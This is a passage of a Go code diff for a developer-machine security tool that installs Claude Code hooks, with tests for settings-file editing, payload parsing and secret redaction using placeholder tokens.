+ b, _ := os.ReadFile(settingsPath(home)) + if !strings.Contains(string(b), "echo user") { + t.Errorf("user hook lost on uninstall: %s", b) + } +} + +func TestInstallPreservesUnrelatedRootKeys(t *testing.T) { + body := "{\n\t\"theme\": \"dark\",\n\t\"hooks\": {}\n}\n" + home := newHomeWithSettings(t, body) + a := New(home, testBinary) + if _, err := a.Install(context.Background()); err != nil { + t.Fatalf("Install: %v", err) + } + b, _ := os.ReadFile(settingsPath(home)) + out := string(b) + if !strings.Contains(out, `"theme": "dark"`) { + t.Errorf("unrelated theme key/value was lost:\n%s", out) + } +} + +func TestInstallNoOpDoesNotRewriteSettings(t *testing.T) { + home := newHomeWithSettings(t, `{"theme":"dark"}`) + a := New(home, testBinary) + // First install brings file into desired state. + if _, err := a.Install(context.Background()); err != nil { + t.Fatalf("first install: %v", err) + } + before, _ := os.ReadFile(settingsPath(home)) + matches, _ := filepath.Glob(settingsPath(home) + ".dmg-*.bak") + beforeBackups := len(matches) + // Second install should be a no-op. + res, err := a.Install(context.Background()) + if err != nil { + t.Fatalf("second install: %v", err) + } + after, _ := os.ReadFile(settingsPath(home)) + if !bytes.Equal(before, after) { + t.Errorf("idempotent install rewrote settings:\n before %s\n after %s", before, after) + } + matches, _ = filepath.Glob(settingsPath(home) + ".dmg-*.bak") + if len(matches) != beforeBackups { + t.Errorf("idempotent install created a new backup: %v", matches) + } + if len(res.BackupFiles) != 0 || len(res.WrittenFiles) != 0 { + t.Errorf("expected empty file slices on no-op install, got %+v", res) + } +} + +// TestUninstallPreservesUserHookAfterManagedEntry covers an array-shift +// bug in the previous span-based renderer — it matched array elements +// by index, so removing the managed entry at index 0 could overwrite +// the user entry that shifted into index 0. 
+func TestUninstallPreservesUserHookAfterManagedEntry(t *testing.T) { + body := `{"hooks":{"PreToolUse":[{"matcher":"*","hooks":[{"type":"command","command":"/usr/local/bin/stepsecurity-dev-machine-guard _hook claude-code PreToolUse","timeout":30},{"timeout":5,"type":"command","command":"echo user"}]}]}}` + home := newHomeWithSettings(t, body) + a := New(home, testBinary) + if _, err := a.Uninstall(context.Background()); err != nil { + t.Fatalf("Uninstall: %v", err) + } + out, _ := os.ReadFile(settingsPath(home)) + if !strings.Contains(string(out), `"command": "echo user"`) { + t.Fatalf("user hook after managed entry was lost: %s", out) + } + if isManagedCommand(string(out)) && strings.Contains(string(out), "stepsecurity-dev-machine-guard _hook claude-code") { + t.Fatalf("managed entry survived uninstall: %s", out) + } +} + +// TestInstallOnAlreadyInstalledFileNoFinalNewlineIsNoOp asserts that +// an already-installed settings file without a trailing newline is +// left alone — the previous renderer always appended `\n`, creating a +// pointless backup on every install of an idempotent file. 
+func TestInstallOnAlreadyInstalledFileNoFinalNewlineIsNoOp(t *testing.T) { + body := `{"hooks":{"PreToolUse":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code PreToolUse","timeout":30}]}],"PostToolUse":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code PostToolUse","timeout":30}]}],"SessionStart":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code SessionStart","timeout":30}]}],"SessionEnd":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code SessionEnd","timeout":30}]}],"UserPromptSubmit":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code UserPromptSubmit","timeout":30}]}],"Stop":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code Stop","timeout":30}]}],"SubagentStop":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code SubagentStop","timeout":30}]}],"Notification":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code Notification","timeout":30}]}],"PostToolUseFailure":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code PostToolUseFailure","timeout":30}]}],"Elicitation":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code Elicitation","timeout":30}]}],"ElicitationResult":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code ElicitationResult","timeout":30}]}],"PermissionRequest":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code PermissionRequest","timeout":30}]}],"PermissionDenied":[{"matcher":"*","hooks":[{"type":"command","command":"` + testBinary + ` _hook claude-code PermissionDenied","timeout":30}]}]}}` + home := newHomeWithSettings(t, body) + a := New(home, testBinary) + before, _ := 
os.ReadFile(settingsPath(home)) + res, err := a.Install(context.Background()) + if err != nil { + t.Fatal(err) + } + after, _ := os.ReadFile(settingsPath(home)) + if !bytes.Equal(before, after) { + t.Fatalf("no-op install rewrote settings:\n before %s\n after %s", before, after) + } + if len(res.BackupFiles) != 0 { + t.Fatalf("no-op install created backup %v", res.BackupFiles) + } +} + +func TestInstallRejectsMalformedJSON(t *testing.T) { + home := newHomeWithSettings(t, `{not json`) + a := New(home, testBinary) + if _, err := a.Install(context.Background()); err == nil { + t.Fatal("expected error on malformed JSON") + } + // File must remain untouched on parse failure. + out, _ := os.ReadFile(settingsPath(home)) + if string(out) != `{not json` { + t.Fatalf("file was modified despite parse failure: %s", out) + } +} + +// TestInstallRefreshesStaleBinaryPath asserts the self-heal behavior +// for the binary-move case: when settings already contain a managed +// entry pointing at an old absolute path, a fresh `hooks install` +// rewrites the command to the current binaryPath. Without this, +// `brew upgrade` (which relocates the binary in the Cellar) would +// silently break hooks until the user noticed. 
+func TestInstallRefreshesStaleBinaryPath(t *testing.T) { + stalePath := "/old/path/stepsecurity-dev-machine-guard" + body := `{"hooks":{"PreToolUse":[{"matcher":"*","hooks":[{"type":"command","command":"` + stalePath + ` _hook claude-code PreToolUse","timeout":30}]}]}}` + home := newHomeWithSettings(t, body) + a := New(home, testBinary) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + out, _ := os.ReadFile(settingsPath(home)) + if strings.Contains(string(out), stalePath) { + t.Errorf("stale binary path not refreshed: %s", out) + } + if !strings.Contains(string(out), testBinary) { + t.Errorf("new binary path not written: %s", out) + } +} + +func TestDetectReportsPathFromExecutor(t *testing.T) { + home := t.TempDir() + a := New(home, testBinary) + + // Not on $PATH → Detected=false, no error. + mock := executor.NewMock() + res, err := a.Detect(context.Background(), mock) + if err != nil { + t.Fatalf("Detect: %v", err) + } + if res.Detected { + t.Errorf("expected Detected=false when claude not on $PATH") + } + + // On $PATH → Detected=true with BinaryPath populated. 
+ mock.SetPath("claude", "/usr/local/bin/claude") + res, err = a.Detect(context.Background(), mock) + if err != nil { + t.Fatalf("Detect: %v", err) + } + if !res.Detected { + t.Errorf("expected Detected=true when claude on $PATH") + } + if res.BinaryPath != "/usr/local/bin/claude" { + t.Errorf("BinaryPath = %q, want /usr/local/bin/claude", res.BinaryPath) + } +} + +func TestParseEventInfersBashAsCommandExec(t *testing.T) { + a := New(t.TempDir(), testBinary) + raw := []byte(`{"session_id":"s1","cwd":"/tmp","tool_name":"Bash","tool_input":{"command":"echo hi","cwd":"/tmp"}}`) + ev, err := a.ParseEvent(context.Background(), event.HookPreToolUse, raw) + if err != nil { + t.Fatal(err) + } + if ev.ActionType != event.ActionCommandExec { + t.Errorf("action: %s", ev.ActionType) + } + cmd, cwd, ok := a.ShellCommand(ev) + if !ok || cmd == "" || cwd == "" { + t.Errorf("expected shell command extraction") + } +} + +func TestParseEventRedactsSecretsInPayload(t *testing.T) { + a := New(t.TempDir(), testBinary) + raw := []byte(`{"tool_name":"Bash","tool_input":{"command":"GITHUB_TOKEN=ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa make deploy"}}`) + ev, err := a.ParseEvent(context.Background(), event.HookPreToolUse, raw) + if err != nil { + t.Fatal(err) + } + encoded, _ := json.Marshal(ev) + if strings.Contains(string(encoded), "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") { + t.Errorf("event payload still contains secret: %s", encoded) + } +} + +func TestParseEventLifecycleHooksOmitActionType(t *testing.T) { + a := New(t.TempDir(), testBinary) + cases := []event.HookEvent{ + event.HookSessionStart, + event.HookSessionEnd, + event.HookNotification, + event.HookStop, + event.HookSubagentStop, + event.HookUserPrompt, + event.HookElicitation, + event.HookElicitationResult, + event.HookPermissionRequest, + event.HookPermissionDenied, + } + for _, ht := range cases { + t.Run(string(ht), func(t *testing.T) { + ev, err := a.ParseEvent(context.Background(), ht, []byte(`{}`)) + if err != nil { + 
t.Fatal(err) + } + if ev.ActionType != "" { + t.Errorf("hook %s: expected empty action_type, got %q", ht, ev.ActionType) + } + encoded, _ := json.Marshal(ev) + if strings.Contains(string(encoded), `"action_type"`) { + t.Errorf("hook %s: action_type key must be omitted from JSON, got %s", ht, encoded) + } + }) + } +} + +func TestParseEventScrubsElicitationContent(t *testing.T) { + a := New(t.TempDir(), testBinary) + raw := []byte(`{ + "mcp_server_name":"github", + "action":"accepted", + "content":{"otp":"123456","api_secret":"sk_live_abc","note":"hello"} + }`) + ev, err := a.ParseEvent(context.Background(), event.HookElicitationResult, raw) + if err != nil { + t.Fatal(err) + } + encoded, _ := json.Marshal(ev) + got := string(encoded) + for _, leak := range []string{"123456", "sk_live_abc", `"otp"`, `"api_secret"`, "hello"} { + if strings.Contains(got, leak) { + t.Errorf("content value leaked into payload: %s in %s", leak, got) + } + } + if !strings.Contains(got, `"content_present":true`) { + t.Errorf("expected content_present marker; got %s", got) + } + if !strings.Contains(got, `"action":"accepted"`) { + t.Errorf("action should be preserved; got %s", got) + } +} + +func TestParseEventPreservesUserPromptAndRedactsSecretsInIt(t *testing.T) { + a := New(t.TempDir(), testBinary) + raw := []byte(`{ + "session_id":"s", + "cwd":"/tmp", + "prompt":"deploy the staging service using GITHUB_TOKEN=ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" + }`) + ev, err := a.ParseEvent(context.Background(), event.HookUserPrompt, raw) + if err != nil { + t.Fatal(err) + } + encoded, _ := json.Marshal(ev) + got := string(encoded) + if strings.Contains(got, `"prompt_present"`) { + t.Errorf("prompt must be preserved, not replaced with presence marker: %s", got) + } + prompt, _ := ev.Payload["prompt"].(string) + if !strings.Contains(prompt, "deploy the staging service") { + t.Errorf("user prompt text must survive: %q", prompt) + } + if strings.Contains(got, 
"ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") { + t.Errorf("secret pasted into prompt leaked: %s", got) + } +} + +func TestParseEventCapturesSpecFields(t *testing.T) { + a := New(t.TempDir(), testBinary) + raw := []byte(`{ + "session_id":"s1", + "transcript_path":"/tmp/t.jsonl", + "cwd":"/tmp", + "hook_event_name":"PreToolUse", + "permission_mode":"default", + "tool_name":"Bash", + "tool_use_id":"toolu_01abc", + "tool_input":{"command":"echo hi"} + }`) + ev, err := a.ParseEvent(context.Background(), event.HookPreToolUse, raw) + if err != nil { + t.Fatal(err) + } + if ev.ToolUseID != "toolu_01abc" { + t.Errorf("ToolUseID: %q", ev.ToolUseID) + } + if ev.PermissionMode != "default" { + t.Errorf("PermissionMode: %q", ev.PermissionMode) + } +} + +func TestParseEventHookEventNameMismatchKeepsCLIHookType(t *testing.T) { + a := New(t.TempDir(), testBinary) + raw := []byte(`{"hook_event_name":"PostToolUse","tool_name":"Bash","tool_input":{"command":"echo hi"}}`) + ev, err := a.ParseEvent(context.Background(), event.HookPreToolUse, raw) + if err != nil { + t.Fatal(err) + } + if ev.HookEvent != event.HookPreToolUse { + t.Errorf("HookType should follow CLI arg, got %q", ev.HookEvent) + } + if len(ev.Errors) != 1 || ev.Errors[0].Code != "hook_event_name_mismatch" { + t.Errorf("expected hook_event_name_mismatch error, got %+v", ev.Errors) + } +} + +func TestParseEventPopulatesHookPhase(t *testing.T) { + a := New(t.TempDir(), testBinary) + cases := []struct { + hook event.HookEvent + phase event.HookPhase + }{ + {event.HookPreToolUse, event.HookPhasePreTool}, + {event.HookPostToolUse, event.HookPhasePostTool}, + {event.HookPostToolUseFailure, event.HookPhasePostToolFailure}, + {event.HookPermissionRequest, event.HookPhasePermissionRequest}, + {event.HookPermissionDenied, event.HookPhasePermissionDenied}, + {event.HookElicitation, event.HookPhaseElicitation}, + {event.HookElicitationResult, event.HookPhaseElicitationResult}, + {event.HookUserPrompt, event.HookPhaseUserPrompt}, + 
{event.HookSessionStart, event.HookPhaseSessionStart}, + {event.HookSessionEnd, event.HookPhaseSessionEnd}, + {event.HookNotification, event.HookPhaseNotification}, + {event.HookStop, event.HookPhaseStop}, + {event.HookSubagentStop, event.HookPhaseSubagentStop}, + } + for _, tc := range cases { + t.Run(string(tc.hook), func(t *testing.T) { + ev, err := a.ParseEvent(context.Background(), tc.hook, []byte(`{}`)) + if err != nil { + t.Fatal(err) + } + if ev.HookPhase != tc.phase { + t.Errorf("hook %s: expected phase %q, got %q", tc.hook, tc.phase, ev.HookPhase) + } + if string(ev.HookEvent) != string(tc.hook) { + t.Errorf("HookEvent must remain native: got %q", ev.HookEvent) + } + }) + } +} + +func TestParseEventPostToolUseFailureSetsErrorStatus(t *testing.T) { + a := New(t.TempDir(), testBinary) + raw := []byte(`{"tool_name":"Bash","tool_input":{"command":"exit 1"},"error":"boom"}`) + ev, err := a.ParseEvent(context.Background(), event.HookPostToolUseFailure, raw) + if err != nil { + t.Fatal(err) + } + if ev.ResultStatus != event.ResultError { + t.Errorf("PostToolUseFailure must set result_status=error, got %q", ev.ResultStatus) + } +} + +func TestDecideResponseAllowShape(t *testing.T) { + a := New(t.TempDir(), testBinary) + resp := a.DecideResponse(&event.Event{HookEvent: event.HookPreToolUse}, adapter.AllowDecision()) + encoded, _ := json.Marshal(resp) + got := string(encoded) + want := `{"continue":true,"suppressOutput":true}` + if got != want { + t.Errorf("allow shape mismatch:\n got %s\n want %s", got, want) + } +} + +func TestDecideResponsePreToolUseBlockShape(t *testing.T) { + a := New(t.TempDir(), testBinary) + ev := &event.Event{HookEvent: event.HookPreToolUse} + resp := a.DecideResponse(ev, adapter.Decision{Allow: false, UserMessage: "Blocked by your organization's administrator."}) + encoded, _ := json.Marshal(resp) + var got map[string]any + if err := json.Unmarshal(encoded, &got); err != nil { + t.Fatal(err) + } + // MUST NOT halt the agent. 
+ if v, ok := got["continue"]; ok && v == false { + t.Errorf("PreToolUse block must not emit continue:false: %s", encoded) + } + // MUST NOT use the deprecated top-level fields. + for _, k := range []string{"decision", "reason", "stopReason"} { + if _, ok := got[k]; ok { + t.Errorf("PreToolUse block must not carry deprecated %q: %s", k, encoded) + } + } + hso, ok := got["hookSpecificOutput"].(map[string]any) + if !ok { + t.Fatalf("missing hookSpecificOutput: %s", encoded) + } + if hso["hookEventName"] != "PreToolUse" { + t.Errorf("hookEventName: %v", hso["hookEventName"]) + } + if hso["permissionDecision"] != "deny" { + t.Errorf("permissionDecision: %v", hso["permissionDecision"]) + } + if hso["permissionDecisionReason"] != "Blocked by your organization's administrator." { + t.Errorf("permissionDecisionReason: %v", hso["permissionDecisionReason"]) + } +} + +func TestDecideResponseDefaultBlockMessage(t *testing.T) { + // The user-visible deny string is "Blocked by your organization's + // administrator." When the runtime passes a Decision with empty + // UserMessage, the adapter must substitute this literal verbatim. 
+ a := New(t.TempDir(), testBinary) + ev := &event.Event{HookEvent: event.HookPreToolUse} + resp := a.DecideResponse(ev, adapter.Decision{Allow: false}) + encoded, _ := json.Marshal(resp) + if !strings.Contains(string(encoded), "Blocked by your organization's administrator.") { + t.Errorf("default deny message missing/changed: %s", encoded) + } +} + +func TestDecideResponseNonPreToolUseBlockNeverHalts(t *testing.T) { + a := New(t.TempDir(), testBinary) + for _, ht := range []event.HookEvent{ + event.HookPostToolUse, event.HookSessionStart, event.HookSessionEnd, + event.HookNotification, event.HookStop, event.HookSubagentStop, + event.HookUserPrompt, event.HookPostToolUseFailure, + } { + resp := a.DecideResponse(&event.Event{HookEvent: ht}, adapter.Decision{Allow: false, UserMessage: "x"}) + encoded, _ := json.Marshal(resp) + var got map[string]any + _ = json.Unmarshal(encoded, &got) + if v, ok := got["continue"]; ok && v == false { + t.Errorf("hook %s: stray block must not emit continue:false: %s", ht, encoded) + } + if _, ok := got["hookSpecificOutput"]; ok { + t.Errorf("hook %s: stray block must not synthesize hookSpecificOutput: %s", ht, encoded) + } + } +} + +func TestDecideResponseNilEventAllows(t *testing.T) { + a := New(t.TempDir(), testBinary) + resp := a.DecideResponse(nil, adapter.Decision{Allow: false, UserMessage: "should be ignored"}) + encoded, _ := json.Marshal(resp) + if string(encoded) != `{"continue":true,"suppressOutput":true}` { + t.Errorf("nil ev must allow, got %s", encoded) + } +} + +func TestInstallWiresPermissionHooks(t *testing.T) { + home := t.TempDir() + a := New(home, testBinary) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + b, _ := os.ReadFile(settingsPath(home)) + for _, want := range []string{`"PermissionRequest"`, `"PermissionDenied"`} { + if !strings.Contains(string(b), want) { + t.Errorf("settings.json missing %s key: %s", want, b) + } + } +} + +func TestInstallWiresElicitationHooks(t 
*testing.T) { + home := t.TempDir() + a := New(home, testBinary) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + b, _ := os.ReadFile(settingsPath(home)) + for _, want := range []string{`"Elicitation"`, `"ElicitationResult"`} { + if !strings.Contains(string(b), want) { + t.Errorf("settings.json missing %s key: %s", want, b) + } + } +} + +func TestInstallWiresPostToolUseFailure(t *testing.T) { + home := t.TempDir() + a := New(home, testBinary) + res, err := a.Install(context.Background()) + if err != nil { + t.Fatal(err) + } + if !slices.Contains(res.HooksAdded, event.HookPostToolUseFailure) { + t.Errorf("expected PostToolUseFailure in HooksAdded: %+v", res.HooksAdded) + } + b, _ := os.ReadFile(settingsPath(home)) + if !strings.Contains(string(b), `"PostToolUseFailure"`) { + t.Errorf("settings.json missing PostToolUseFailure key: %s", b) + } +} + +// TestInstallCreatesParentDirWhenAbsent asserts that Install can run +// against a fresh home without ~/.claude/ existing — the atomicfile +// layer creates parent dirs and reports them in CreatedDirs so the +// install handler can chown them under root. +func TestInstallCreatesParentDirWhenAbsent(t *testing.T) { + home := t.TempDir() + a := New(home, testBinary) + res, err := a.Install(context.Background()) + if err != nil { + t.Fatalf("Install: %v", err) + } + if _, statErr := os.Stat(filepath.Join(home, ".claude")); statErr != nil { + t.Errorf("~/.claude/ not created: %v", statErr) + } + if _, statErr := os.Stat(settingsPath(home)); statErr != nil { + t.Errorf("settings.json not created: %v", statErr) + } + // CreatedDirs must include ~/.claude so the install handler can + // chown it under root. 
+ wantDir := filepath.Join(home, ".claude") + if !slices.Contains(res.CreatedDirs, wantDir) { + t.Errorf("CreatedDirs missing %q: got %v", wantDir, res.CreatedDirs) + } +} diff --git a/internal/aiagents/adapter/claudecode/hooks.go b/internal/aiagents/adapter/claudecode/hooks.go new file mode 100644 index 0000000..693759e --- /dev/null +++ b/internal/aiagents/adapter/claudecode/hooks.go @@ -0,0 +1,33 @@ +package claudecode + +import "github.com/step-security/dev-machine-guard/internal/aiagents/event" + +// supportedHookEvents enumerates the Claude Code hook events DMG wires +// up. Order is significant for install/uninstall reproducibility — +// append, do not insert. This list is the single source of truth for +// what `hooks install --agent claude-code` writes into +// ~/.claude/settings.json. +var supportedHookEvents = []event.HookEvent{ + event.HookPreToolUse, + event.HookPostToolUse, + event.HookSessionStart, + event.HookSessionEnd, + event.HookUserPrompt, + event.HookStop, + event.HookSubagentStop, + event.HookNotification, + event.HookPostToolUseFailure, + event.HookElicitation, + event.HookElicitationResult, + event.HookPermissionRequest, + event.HookPermissionDenied, +} + +// SupportedHooks returns a fresh copy of the Claude-supported hook list. +// Callers may freely mutate the returned slice without affecting adapter +// internals. 
+func (a *Adapter) SupportedHooks() []event.HookEvent { + out := make([]event.HookEvent, len(supportedHookEvents)) + copy(out, supportedHookEvents) + return out +} diff --git a/internal/aiagents/adapter/claudecode/parse.go b/internal/aiagents/adapter/claudecode/parse.go new file mode 100644 index 0000000..046cd54 --- /dev/null +++ b/internal/aiagents/adapter/claudecode/parse.go @@ -0,0 +1,227 @@ +package claudecode + +import ( + "context" + "encoding/json" + "fmt" + "strings" + "time" + + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/aiagents/redact" +) + +// ParseEvent normalizes a Claude Code hook stdin payload into an event. +// The raw payload is REDACTED before being attached to the result; the +// original bytes never appear in the returned event. +func (a *Adapter) ParseEvent(ctx context.Context, hookType event.HookEvent, raw []byte) (*event.Event, error) { + var generic map[string]any + if err := json.Unmarshal(raw, &generic); err != nil { + return nil, fmt.Errorf("claudecode parse: %w", err) + } + if generic == nil { + generic = map[string]any{} + } + + ev := &event.Event{ + SchemaVersion: event.SchemaVersion, + EventID: event.NewEventID(), + Timestamp: time.Now().UTC(), + AgentName: AgentName, + HookEvent: hookType, + HookPhase: phaseFor(hookType), + ResultStatus: event.ResultObserved, + } + + // Spec-documented fields only. Names match + // https://code.claude.com/docs/en/hooks.md verbatim. + ev.SessionID = stringField(generic, "session_id") + ev.WorkingDirectory = stringField(generic, "cwd") + ev.ToolName = stringField(generic, "tool_name") + ev.ToolUseID = stringField(generic, "tool_use_id") + ev.PermissionMode = stringField(generic, "permission_mode") + + // Cross-check: the CLI arg names which hook command Claude invoked. + // On disagreement, keep runtime behavior tied to that hook and record + // the payload mismatch for audit. 
The payload claim is not persisted + // as a field of its own — ev.HookEvent is the single source of truth, + // and the mismatch annotation captures the disagreement. + if claimed := stringField(generic, "hook_event_name"); claimed != "" && claimed != string(hookType) { + ev.Errors = append(ev.Errors, event.ErrorInfo{ + Stage: "parse", + Code: "hook_event_name_mismatch", + Message: "cli arg=" + string(hookType) + " payload=" + claimed, + }) + } + + ev.ActionType = inferActionType(ev.HookEvent, ev.ToolName, generic) + + // PostToolUseFailure means the tool already failed; record the + // canonical error status so downstream readers don't have to peek + // inside the payload to learn the outcome. + if ev.HookEvent == event.HookPostToolUseFailure { + ev.ResultStatus = event.ResultError + } + + // Attach a redacted view of the payload. Drop high-volume transcript + // fields by default — they may be re-attached later by an enrichment. + cleaned := scrubPayload(generic) + ev.Payload = redact.Value(cleaned).(map[string]any) + + ev.IsSensitive = isSensitivePayload(generic) + + return ev, nil +} + +// scrubPayload removes payload fields whose values are either too bulky +// to embed in a record or too unstructured for the key-based redactor +// to handle safely: +// +// - transcript / messages: full chat history; can be many MB. +// - stdout / stderr: tool output; potentially huge and noisy. +// - content: ElicitationResult form-response field. Form values are +// user-defined and may carry OTPs, credentials, or other secrets +// under arbitrary key names the general redactor will not catch. +// +// Each is replaced with a `_present: true` marker. The user's +// prompt (UserPromptSubmit.payload.prompt) is deliberately NOT scrubbed: +// it IS the audit evidence for that hook event, and the standard +// redactor still walks the value to scrub any secrets pasted into it. 
+func scrubPayload(p map[string]any) map[string]any { + out := make(map[string]any, len(p)) + for k, v := range p { + switch strings.ToLower(k) { + case "transcript", "messages", "stdout", "stderr", "content": + out[k+"_present"] = true + case "transcript_path": + // Path is fine; full transcript scanning happens via the secret + // scanner enrichment with bounded reads. + out[k] = v + default: + out[k] = v + } + } + return out +} + +// inferActionType classifies the operation a tool-bearing hook is about +// to perform (PreToolUse) or just performed (PostToolUse, +// PostToolUseFailure). Lifecycle hooks (SessionStart, SessionEnd, +// Notification, Stop, SubagentStop, UserPromptSubmit) return "" — the +// hook_event field already names the lifecycle phase, so action_type +// is omitted in those records. +func inferActionType(hookEvent event.HookEvent, toolName string, p map[string]any) event.ActionType { + switch hookEvent { + case event.HookPreToolUse, event.HookPostToolUse, event.HookPostToolUseFailure: + // fall through to tool-name routing + default: + return "" + } + switch strings.ToLower(toolName) { + case "bash", "shell": + return event.ActionCommandExec + case "read": + return event.ActionFileRead + case "write", "edit", "multiedit": + return event.ActionFileWrite + case "webfetch", "websearch", "http": + return event.ActionNetworkRequest + case "": + // Some hook payloads carry the command nested under tool_input. + if hasShellCommand(p) { + return event.ActionCommandExec + } + return "" + default: + if strings.HasPrefix(strings.ToLower(toolName), "mcp__") { + return event.ActionMCPInvocation + } + return event.ActionToolUse + } +} + +func hasShellCommand(p map[string]any) bool { + ti, ok := p["tool_input"].(map[string]any) + if !ok { + return false + } + if _, ok := ti["command"].(string); ok { + return true + } + return false +} + +// ShellCommand extracts the redacted shell command from a Claude Code +// hook payload, if any. 
Returns the empty string when no shell command +// is present. The result has already been redacted. +func (a *Adapter) ShellCommand(ev *event.Event) (cmd string, cwd string, ok bool) { + if ev == nil || ev.Payload == nil { + return "", "", false + } + ti, ok := ev.Payload["tool_input"].(map[string]any) + if !ok { + return "", ev.WorkingDirectory, false + } + c, ok := ti["command"].(string) + if !ok || c == "" { + return "", ev.WorkingDirectory, false + } + wd, _ := ti["cwd"].(string) + if wd == "" { + wd = ev.WorkingDirectory + } + return c, wd, true +} + +func isSensitivePayload(p map[string]any) bool { + ti, ok := p["tool_input"].(map[string]any) + if !ok { + return false + } + for _, key := range []string{"file_path", "path", "filename"} { + if v, ok := ti[key].(string); ok && redact.IsSensitivePath(v) { + return true + } + } + return false +} + +func stringField(m map[string]any, k string) string { + v, _ := m[k].(string) + return v +} + +// phaseFor maps a Claude Code native hook event onto the normalized +// hook phase. Cross-agent consumers (policy, filtering) branch on +// phase; agent-specific consumers may still inspect HookEvent. 
+// phaseFor maps a hook event name onto the agent-neutral HookPhase.
+// Events without a case fall through to HookPhaseUnknown.
+func phaseFor(h event.HookEvent) event.HookPhase {
+	switch h {
+	case event.HookPreToolUse:
+		return event.HookPhasePreTool
+	case event.HookPostToolUse:
+		return event.HookPhasePostTool
+	case event.HookPostToolUseFailure:
+		return event.HookPhasePostToolFailure
+	case event.HookPermissionRequest:
+		return event.HookPhasePermissionRequest
+	case event.HookPermissionDenied:
+		return event.HookPhasePermissionDenied
+	case event.HookElicitation:
+		return event.HookPhaseElicitation
+	case event.HookElicitationResult:
+		return event.HookPhaseElicitationResult
+	case event.HookUserPrompt:
+		return event.HookPhaseUserPrompt
+	case event.HookSessionStart:
+		return event.HookPhaseSessionStart
+	case event.HookSessionEnd:
+		return event.HookPhaseSessionEnd
+	case event.HookNotification:
+		return event.HookPhaseNotification
+	case event.HookStop:
+		return event.HookPhaseStop
+	case event.HookSubagentStop:
+		return event.HookPhaseSubagentStop
+	}
+	return event.HookPhaseUnknown
+}
diff --git a/internal/aiagents/adapter/claudecode/settings.go b/internal/aiagents/adapter/claudecode/settings.go
new file mode 100644
index 0000000..36e713b
--- /dev/null
+++ b/internal/aiagents/adapter/claudecode/settings.go
@@ -0,0 +1,359 @@
+package claudecode
+
+import (
+	"bytes"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io/fs"
+	"os"
+	"regexp"
+	"slices"
+
+	"github.com/tidwall/gjson"
+	"github.com/tidwall/pretty"
+	"github.com/tidwall/sjson"
+
+	"github.com/step-security/dev-machine-guard/internal/aiagents/atomicfile"
+	"github.com/step-security/dev-machine-guard/internal/aiagents/configedit"
+	"github.com/step-security/dev-machine-guard/internal/aiagents/event"
+)
+
+// settingsDoc holds raw bytes for ~/.claude/settings.json. orig is the
+// bytes as read from disk (nil if the file did not exist); json is the
+// in-memory mutation buffer that starts equal to orig (or `{}` for
+// missing/empty input). All edits go through tidwall/sjson so that
+// unrelated user formatting is preserved byte-for-byte.
+//
+// Hooks have this shape per Claude Code docs:
+//
+//	"hooks": {
+//	  "PreToolUse": [
+//	    {
+//	      "matcher": "*",
+//	      "hooks": [
+//	        {"type": "command", "command": "...", "timeout": 30}
+//	      ]
+//	    }
+//	  ]
+//	}
+type settingsDoc struct {
+	orig []byte
+	json []byte
+}
+
+const (
+	// hookTimeoutSeconds is the per-entry timeout written into each
+	// installed hook (the `timeout` field on hookEntry).
+	hookTimeoutSeconds = 30
+	// matcherAll is the catch-all matcher value DMG installs under.
+	matcherAll = "*"
+)
+
+// settingsMode is the default mode for ~/.claude/settings.json. The
+// atomicfile helpers preserve a tighter existing mode if present.
+const settingsMode = os.FileMode(0o600)
+
+// managedCmdRE is the uninstall match criterion. It matches
+// an entry's `command` field when the executable token is the DMG
+// binary, regardless of which absolute path it sits behind. The
+// `(^|/)` left-side accepts both bare invocations and absolute-path
+// invocations, while rejecting prefix collisions like
+// `mystepsecurity-dev-machine-guard`.
+var managedCmdRE = regexp.MustCompile(`(^|/)stepsecurity-dev-machine-guard\s+_hook\s+`)
+
+// loadSettings reads path into a settingsDoc. A missing file yields an
+// empty `{}` document (orig stays nil so a later no-change write is a
+// no-op); an unreadable or unparseable file is an error.
+func loadSettings(path string) (*settingsDoc, error) {
+	b, err := os.ReadFile(path)
+	if err != nil {
+		if errors.Is(err, fs.ErrNotExist) {
+			return &settingsDoc{json: []byte(`{}`)}, nil
+		}
+		return nil, fmt.Errorf("claude settings read: %w", err)
+	}
+	normalized, err := configedit.NormalizeJSONObject(b)
+	if err != nil {
+		return nil, fmt.Errorf("claude settings parse: %w", err)
+	}
+	return &settingsDoc{orig: b, json: normalized}, nil
+}
+
+// hookEventPath builds the configedit path that addresses the entry
+// list for one hook event under the top-level "hooks" key.
+func hookEventPath(hookType event.HookEvent) string {
+	return configedit.Path("hooks", string(hookType))
+}
+
+// hookEntry is the inner record we install. DMG entries are identified
+// on uninstall by the regex `managedCmdRE` matching the command
+// field, not by a metadata marker.
+type hookEntry struct {
+	Type    string `json:"type"`
+	Command string `json:"command"`
+	Timeout int    `json:"timeout,omitempty"`
+}
+
+// installEntry builds the canonical DMG hook entry for command:
+// type "command" with the shared hookTimeoutSeconds timeout.
+func installEntry(command string) hookEntry {
+	return hookEntry{
+		Type:    "command",
+		Command: command,
+		Timeout: hookTimeoutSeconds,
+	}
+}
+
